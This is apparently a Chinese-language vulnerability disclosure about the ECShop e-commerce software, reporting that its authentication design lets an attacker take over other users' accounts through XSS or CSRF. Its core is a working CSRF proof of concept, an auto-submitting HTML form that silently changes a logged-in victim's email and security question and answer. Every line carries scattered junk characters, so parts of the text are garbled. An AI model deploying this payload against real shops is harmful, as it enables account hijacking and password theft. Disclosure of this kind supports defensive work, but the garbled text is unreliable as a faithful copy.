简要描述:
& n* _2 ~! {6 n- U; gecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现- F, q: d3 }7 N! _
$ F, w/ a' G$ \" t4 c* l( D2 Q; @4 I
Demo For:http://www.wooyun.org/bug.php?action=view&id=395
2 H6 x# s" H2 W y6 ?
6 F9 v1 u+ `- J: N: |0 H. ~详细说明:- F% R1 {9 q3 M# n F/ U7 }; [
利用csrf和xss可以突破官方所说的“障碍”
+ B+ }1 Y+ s4 fxss版本已经有人说明
5 [4 k, N" ~$ ]7 ?8 v6 [这里给出csrf版本4 b! @1 n% G$ u2 q
, C7 z- ~# ` ?/ L/ U. S+ w9 ~# {
漏洞证明:* u! t4 s9 f# e4 k; j
<html>
' n# b% a3 V& U5 ^<body>* z6 ~5 e+ A; j! J4 K
<form action="http://www.wooyun.org/ecshop/user.php" method="POST">" Z; q8 }6 d- _" x
<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">
) N+ F" c6 y: X/ M+ f<INPUT TYPE="text" NAME="act" value="act_edit_profile">! T4 c3 g- Z: l
<INPUT TYPE="text" NAME="sel_question" value="ecshop">- v& e5 E' b2 `4 {( x
<INPUT TYPE="text" NAME="passwd_answer" value="exploit">
9 H/ t$ p& l5 h* C3 D5 V4 J</body>+ Y6 ^4 I' D* K: _
<script>
% o% J2 H9 _( x' gdocument.forms[0].submit();# N' R% U: ]3 F+ X4 c9 d8 Q8 A
</script>
3 ?& }, V- e" ?: f; W</html>
% l6 x1 T% V& V( n9 g# M% q( U构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失3 p! W# v" x* H7 K9 V
" Q z8 k8 L( D7 P0 N* L" t9 q0 F |